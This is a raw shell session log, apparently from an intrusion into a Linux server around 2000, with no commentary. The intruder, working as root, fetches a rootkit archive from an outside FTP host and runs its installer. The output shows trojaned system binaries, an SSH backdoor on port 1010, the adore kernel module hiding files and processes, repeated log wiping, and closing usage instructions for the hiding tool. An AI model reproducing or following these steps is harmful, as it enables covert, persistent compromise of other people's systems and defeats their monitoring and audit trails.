cd /;ls -alF;w;uname -a;id
total 74
drwxr-xr-x  17 root     root         1024 Mar 22 22:21 ./
drwxr-xr-x  17 root     root         1024 Mar 22 22:21 ../
drwxr-xr-x   2 root     root         2048 Mar 22 23:16 bin/
drwxr-xr-x   3 root     root         1024 Mar 22 23:04 boot/
drwxr-xr-x   6 root     root        34816 Mar 22 23:14 dev/
drwxr-xr-x  30 root     root         3072 Mar 22 23:29 etc/
drwxr-xr-x   6 root     root         4096 Mar 22 23:03 home/
drwxr-xr-x   4 root     root         3072 Mar 22 22:56 lib/
drwxr-xr-x   2 root     root        12288 Mar 22 22:19 lost+found/
drwxr-xr-x   4 root     root         1024 Mar 22 22:21 mnt/
drwxr-xr-x   2 root     root         1024 Aug 23  1999 opt/
dr-xr-xr-x  49 root     root            0 Mar 22 23:04 proc/
drwxr-x---   6 root     root         1024 Mar 24 08:03 root/
drwxr-xr-x   3 root     root         3072 Mar 22 23:13 sbin/
drwxrwxrwt   3 root     root         1024 Mar 31 04:22 tmp/
drwxr-xr-x  21 root     root         4096 Mar 22 22:46 usr/
drwxr-xr-x  20 root     root         1024 Mar 22 23:03 var/
 12:33pm  up 8 days, 13:29,  0 users,  load average: 0.00, 0.00, 0.00
USER     TTY      FROM              LOGIN@   IDLE   JCPU   PCPU  WHAT
Linux localhost 2.2.14-5.0 #1 Tue Mar 7 21:07:39 EST 2000 i686 unknown
uid=0(root) gid=0(root)
id
uid=0(root) gid=0(root)
ftp ftp.geocities.com
Password:
hash
get rk1010.tgz
Name (ftp.geocities.com:root):
Hash mark printing on (1024 bytes/hash mark).
##############################################################################################################################################################################################################################################################################################################################################################################################################################################################################################################################################################################################################################################################################################################################################################################################################################################################################################################
bye
tar -xvzf rk1010.tgz
rk4/
rk4/bash
rk4/chipsul
rk4/clean
rk4/doliroot
rk4/doliroot2
rk4/doliroot3
rk4/go
rk4/hideall.tar.gz
rk4/httpd.cgi
rk4/ifconfig
rk4/in.rexedcs
rk4/juno
rk4/kkill
rk4/locate
rk4/logclear
rk4/ls
rk4/netstat
rk4/ps
rk4/rotlog
rk4/scaners.tar.gz
rk4/see
rk4/sense
rk4/sl
rk4/sl4
rk4/ssh.tar.gz
rk4/syslogd
rk4/tcp.log
rk4/tcpd
rk4/top
rk4/uptime
rk4/w
rk4/wget
rk4/who
rk4/smurf.tgz
cd rk4
./go

#########################################
#            SSH RootKit IV             #
#---------------------------------------#
#              By DoLittle              #
#                                       #
#########################################

--> Stoping portmap and ftp.....
--> DONE!
in.rexedcs: no process killed
defauths: no process killed
dcs: no process killed
defauths: no process killed
--> CHMod some files.....
chmod: /usr/sbin/userhelper: No such file or directory
--> DONE!
--> Hidding programs so that R00t can't see them....
--> DONE!
--> Hidding ports so that netstat can't see them.....
--> DONE!
--> Installing SSH 1.5-32 BackDoor.....
rcp.statd: no process killed
chattr: No such file or directory while stating /usr/bin/RiP
chattr: No such file or directory while stating /usr/bin/html
chattr: No such file or directory while stating /sbin/xfs
chattr: No such file or directory while stating /usr/bin/nscd
nscd: no process killed
RiP: no process killed
html: no process killed
usr/
usr/bin/
usr/bin/make-ssh-host-key
usr/bin/ssh
usr/bin/ssh-add
usr/bin/ssh-agent
usr/bin/ssh-askpass
usr/bin/ssh-keygen
usr/bin/inet
usr/bin/rc.d
usr/man/
usr/man/man6/
usr/man/man6/ssh_config
usr/man/man6/sshd_config
Generating p: ..........++ (distance 138)
Generating q: ........++ (distance 106)
Computing the keys...
Testing the keys...
Key generation complete.
Initializing random number generator...
Your identification has been saved in /usr/man/man6/ssh_host_key.
Your public key is:
1024 37 130771060340877963314565734611653227155552147936232480797126924233482253133633358932631623913527399105347317420627208322780436383879001858674058045708311267810192020693090760961245002381787117140930978575990196091654782854834444871617809498858023142623077257556478685984617461654340038103514803868667955601351 root@localhost
Your public key has been saved in /usr/man/man6/ssh_host_key.pub
--> DONE!
--> Creating /dev/~tty the base directory and installing some files.....
--> Sniffing and installing inet on port 1010.....
-->Installing hidding device.....
adore/
adore/CVS/
adore/CVS/Root
adore/CVS/Repository
adore/CVS/Entries
adore/Changelog
adore/LICENSE
adore/Makefile.gen
adore/README
adore/TODO
adore/adore.c
adore/ava.c
adore/cleaner.c
adore/configure
adore/dummy.c
adore/exec-test.c
adore/exec.c
adore/libinvisible.c
adore/libinvisible.h
adore/startadore
adore/Makefile
Starting adore configuration ...
Checking 4 ELITE_UID ... found 30
Checking 4 ELITE_CMD ... using 86694
Checking 4 SMP ... NO
Checking 4 MODVERSIONS ... YES
Checking for kgcc ... found cc
Checking 4 insmod ... found /sbin/insmod -- OK
Loaded modules:
nls_cp437               3748   1 (autoclean)
msdos                   5468   1 (autoclean)
fat                    30336   1 (autoclean) [msdos]
lockd                  30344   1 (autoclean)
sunrpc                 52132   1 (autoclean) [lockd]
3c59x                  18980   1 (autoclean)
Since version 0.33 Adore requires 'authentication' for its services.
You will be prompted for a password now and this password will be compiled
into 'adore' and 'ava' so no further actions by you are required.
This procedure will save adore from scanners.
Try to choose a unique name that won't clash with normal calls to mkdir(2).
Password (echoed):
Preparing /dev/~tty/adore (== cwd) for hiding ...
Creating Makefile ...
Exec-redirection disabled ...
rm -f adore.o
cc -c -I/usr/src/linux/include -O2 -Wall -DELITE_CMD=86694 -DELITE_UID=30 -DCURRENT_ADORE=34 -DADORE_KEY=\"\" -DMODVERSIONS adore.c -o adore.o
cc -O2 -Wall -DELITE_CMD=86694 -DELITE_UID=30 -DCURRENT_ADORE=34 -DADORE_KEY=\"\" -DMODVERSIONS ava.c libinvisible.c -o ava
cc -I/usr/src/linux/include -c -O2 -Wall -DELITE_CMD=86694 -DELITE_UID=30 -DCURRENT_ADORE=34 -DADORE_KEY=\"\" -DMODVERSIONS cleaner.c
Checking for adore 0.12 or higher ...
Adore 0.34 installed. Good luck.
File '/dev/~tty' hided.
Checking for adore 0.12 or higher ...
Adore 0.34 installed. Good luck.
File '/usr/bin/inet' hided.
Checking for adore 0.12 or higher ...
Adore 0.34 installed. Good luck.
File '/usr/bin/rc.d' hided.
Checking for adore 0.12 or higher ...
Adore 0.34 installed. Good luck.
Made PID 21397 invisible.
Checking for adore 0.12 or higher ...
Adore 0.34 installed. Good luck.
Made PID 21394 invisible.
--> Cleaning the shit.........
* sauber by socked [07.27.97] *
* Cleaning logs.. This may take a bit depending on the size of the logs.
* Cleaning boot.log (0 lines)...0 lines removed!
* Cleaning boot.log.1 (0 lines)...0 lines removed!
* Cleaning boot.log.2 (18 lines)...0 lines removed!
* Cleaning cron (61 lines)...0 lines removed!
* Cleaning cron.1 (1184 lines)...0 lines removed!
* Cleaning cron.2 (206 lines)...0 lines removed!
* Cleaning dmesg (70 lines)...0 lines removed!
* Cleaning htmlaccess.log (0 lines)...0 lines removed!
* Cleaning maillog (0 lines)...0 lines removed!
* Cleaning maillog.1 (0 lines)...0 lines removed!
* Cleaning maillog.2 (23 lines)...0 lines removed!
* Cleaning messages (0 lines)...0 lines removed!
* Cleaning messages.1 (0 lines)...0 lines removed!
* Cleaning messages.2 (670 lines)...0 lines removed!
* Cleaning netconf.log (0 lines)...0 lines removed!
* Cleaning secure (0 lines)...0 lines removed!
* Cleaning secure.1 (0 lines)...0 lines removed!
* Cleaning secure.2 (22 lines)...0 lines removed!
* Cleaning sendmail.st (4 lines)...3 lines removed!
* Cleaning spooler (0 lines)...0 lines removed!
* Cleaning spooler.1 (0 lines)...0 lines removed!
* Cleaning spooler.2 (0 lines)...0 lines removed!
* Cleaning xferlog (0 lines)...0 lines removed!
* Cleaning xferlog.1 (0 lines)...0 lines removed!
* Cleaning xferlog.2 (0 lines)...0 lines removed!
syslogd: no process killed
* DoLittle is my Master !'Q%&@
* sauber by socked [07.27.97] *
* Cleaning logs.. This may take a bit depending on the size of the logs.
* Cleaning boot.log (0 lines)...0 lines removed!
* Cleaning boot.log.1 (0 lines)...0 lines removed!
* Cleaning boot.log.2 (18 lines)...1 lines removed!
* Cleaning cron (61 lines)...0 lines removed!
* Cleaning cron.1 (1184 lines)...0 lines removed!
* Cleaning cron.2 (206 lines)...0 lines removed!
* Cleaning dmesg (70 lines)...0 lines removed!
* Cleaning htmlaccess.log (0 lines)...0 lines removed!
* Cleaning maillog (0 lines)...0 lines removed!
* Cleaning maillog.1 (0 lines)...0 lines removed!
* Cleaning maillog.2 (23 lines)...0 lines removed!
* Cleaning messages (0 lines)...0 lines removed!
* Cleaning messages.1 (0 lines)...0 lines removed!
* Cleaning messages.2 (670 lines)...115 lines removed!
* Cleaning netconf.log (0 lines)...0 lines removed!
* Cleaning secure (0 lines)...0 lines removed!
* Cleaning secure.1 (0 lines)...0 lines removed!
* Cleaning secure.2 (22 lines)...0 lines removed!
* Cleaning sendmail.st (1 lines)...0 lines removed!
* Cleaning spooler (0 lines)...0 lines removed!
* Cleaning spooler.1 (0 lines)...0 lines removed!
* Cleaning spooler.2 (0 lines)...0 lines removed!
* Cleaning xferlog (0 lines)...0 lines removed!
* Cleaning xferlog.1 (0 lines)...0 lines removed!
* Cleaning xferlog.2 (0 lines)...0 lines removed!
syslogd: no process killed
* DoLittle is my Master !'Q%&@
* sauber by socked [07.27.97] *
* Cleaning logs.. This may take a bit depending on the size of the logs.
* Cleaning boot.log (0 lines)...0 lines removed!
* Cleaning boot.log.1 (0 lines)...0 lines removed!
* Cleaning boot.log.2 (17 lines)...0 lines removed!
* Cleaning cron (61 lines)...0 lines removed!
* Cleaning cron.1 (1184 lines)...0 lines removed!
* Cleaning cron.2 (206 lines)...0 lines removed!
* Cleaning dmesg (70 lines)...0 lines removed!
* Cleaning htmlaccess.log (0 lines)...0 lines removed!
* Cleaning maillog (0 lines)...0 lines removed!
* Cleaning maillog.1 (0 lines)...0 lines removed!
* Cleaning maillog.2 (23 lines)...0 lines removed!
* Cleaning messages (0 lines)...0 lines removed!
* Cleaning messages.1 (0 lines)...0 lines removed!
* Cleaning messages.2 (555 lines)...17 lines removed!
* Cleaning netconf.log (0 lines)...0 lines removed!
* Cleaning secure (0 lines)...0 lines removed!
* Cleaning secure.1 (0 lines)...0 lines removed!
* Cleaning secure.2 (22 lines)...7 lines removed!
* Cleaning sendmail.st (1 lines)...0 lines removed!
* Cleaning spooler (0 lines)...0 lines removed!
* Cleaning spooler.1 (0 lines)...0 lines removed!
* Cleaning spooler.2 (0 lines)...0 lines removed!
* Cleaning xferlog (0 lines)...0 lines removed!
* Cleaning xferlog.1 (0 lines)...0 lines removed!
* Cleaning xferlog.2 (0 lines)...0 lines removed!
syslogd: no process killed
* DoLittle is my Master !'Q%&@
* sauber by socked [07.27.97] *
* Cleaning logs.. This may take a bit depending on the size of the logs.
* Cleaning boot.log (0 lines)...0 lines removed!
* Cleaning boot.log.1 (0 lines)...0 lines removed!
* Cleaning boot.log.2 (17 lines)...0 lines removed!
* Cleaning cron (61 lines)...61 lines removed!
* Cleaning cron.1 (1184 lines)...1184 lines removed!
* Cleaning cron.2 (206 lines)...205 lines removed!
* Cleaning dmesg (70 lines)...2 lines removed!
* Cleaning htmlaccess.log (0 lines)...0 lines removed!
* Cleaning maillog (0 lines)...0 lines removed!
* Cleaning maillog.1 (0 lines)...0 lines removed!
* Cleaning maillog.2 (23 lines)...21 lines removed!
* Cleaning messages (0 lines)...0 lines removed!
* Cleaning messages.1 (0 lines)...0 lines removed!
* Cleaning messages.2 (538 lines)...9 lines removed!
* Cleaning netconf.log (0 lines)...0 lines removed!
* Cleaning secure (0 lines)...0 lines removed!
* Cleaning secure.1 (0 lines)...0 lines removed!
* Cleaning secure.2 (15 lines)...0 lines removed!
* Cleaning sendmail.st (1 lines)...0 lines removed!
* Cleaning spooler (0 lines)...0 lines removed!
* Cleaning spooler.1 (0 lines)...0 lines removed!
* Cleaning spooler.2 (0 lines)...0 lines removed!
* Cleaning xferlog (0 lines)...0 lines removed!
* Cleaning xferlog.1 (0 lines)...0 lines removed!
* Cleaning xferlog.2 (0 lines)...0 lines removed!
syslogd: no process killed
* DoLittle is my Master !'Q%&@
* sauber by socked [07.27.97] *
* Cleaning logs.. This may take a bit depending on the size of the logs.
* Cleaning boot.log (0 lines)...0 lines removed!
* Cleaning boot.log.1 (0 lines)...0 lines removed!
* Cleaning boot.log.2 (17 lines)...0 lines removed!
* Cleaning cron (0 lines)...0 lines removed!
* Cleaning cron.1 (0 lines)...0 lines removed!
* Cleaning cron.2 (1 lines)...0 lines removed!
* Cleaning dmesg (68 lines)...2 lines removed!
* Cleaning htmlaccess.log (0 lines)...0 lines removed!
* Cleaning maillog (0 lines)...0 lines removed!
* Cleaning maillog.1 (0 lines)...0 lines removed!
* Cleaning maillog.2 (2 lines)...0 lines removed!
* Cleaning messages (0 lines)...0 lines removed!
* Cleaning messages.1 (0 lines)...0 lines removed!
* Cleaning messages.2 (529 lines)...3 lines removed!
* Cleaning netconf.log (0 lines)...0 lines removed!
* Cleaning secure (0 lines)...0 lines removed!
* Cleaning secure.1 (0 lines)...0 lines removed!
* Cleaning secure.2 (15 lines)...0 lines removed!
* Cleaning sendmail.st (1 lines)...0 lines removed!
* Cleaning spooler (0 lines)...0 lines removed!
* Cleaning spooler.1 (0 lines)...0 lines removed!
* Cleaning spooler.2 (0 lines)...0 lines removed!
* Cleaning xferlog (0 lines)...0 lines removed!
* Cleaning xferlog.1 (0 lines)...0 lines removed!
* Cleaning xferlog.2 (0 lines)...0 lines removed!
syslogd: no process killed
* DoLittle is my Master !'Q%&@
chattr: No such file or directory while stating /usr/bin/hdparm
mv: httpd.cgi: No such file or directory
sshdu: no process killed
sshd: no process killed
--> R00t over..........server had been taken!!

#######################################
#         --===============--         #
#         RootKit installed.          #
#         --===============--         #
#######################################
#           Technical Info            #
########                       ########
#  ssh ports: 1010                    #
#  ---------------------------------  #
#  r00t dir: /dev/~tty                #
#  ---------------------------------  #
#  Hidding device                     #
#  ---------------------------------  #
#  cd /dev/~tty/adore                 #
#  ./ava h(hide) /path/file           #
#  ./ava i(invisible) PID             #
########                       ########
#######################################
##-----------------------------------##
#  DoLittle <DoLittle@SunOS.Com>      #
#  WHT <WHT@SunOS.Com                 #
#######################################